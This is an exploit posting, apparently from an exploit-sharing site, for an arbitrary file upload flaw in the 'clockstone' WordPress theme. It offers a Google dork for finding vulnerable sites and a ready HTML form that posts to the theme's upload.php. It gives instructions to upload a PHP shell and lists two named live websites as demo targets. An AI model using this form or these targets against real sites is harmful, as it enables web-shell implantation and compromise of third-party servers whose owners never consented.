facebook facebook twitter rss

WordPress theme clockstone Arbitrary File Upload Vulnerability

Author: Xtroj-EnTn , Published: 25-09-2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++



# Exploit Title : WordPress theme clockstone Arbitrary File Upload Vulnerability

# Author : Xtroj-EnTn

# Risk : High

# Vendor Homepage: [http://cmsmasters.net/]

# Class: Remote

# Software Link: [http://themeforest.net/item/clockstone-ultimate-wordpress-theme/306607]

# Google Dork: inurl:/wp-content/themes/clockstone


# Date: 24/09/2014

contact me: xtroj1entn@gmail.com


#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can upload any file on your target.



here is the attack code:
##############################################################
# Shell upload attack By Xtroj-EnTn:
# <form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
# <input type="text" name="url" value="./" />
# Please choose a file: <input name="uploadfile" type="file" />
# <input type="submit" value="Upload" />
# </form>
##############################################################

click on upload then choice your shell click upload,after that
you would see on your screen the name of your uploaded file in hash form


Demo:



1. upload yourshell.php file on site using the code:


http://smboardwalk.movsports.com/wp-content/themes/clockstone/theme/functions/upload.php
http://openvase.com/wp-content/themes/clockstone/theme/functions/upload.php

Greetz To:Hatem Dridi & Thnx to Allah

Like us on Facebook :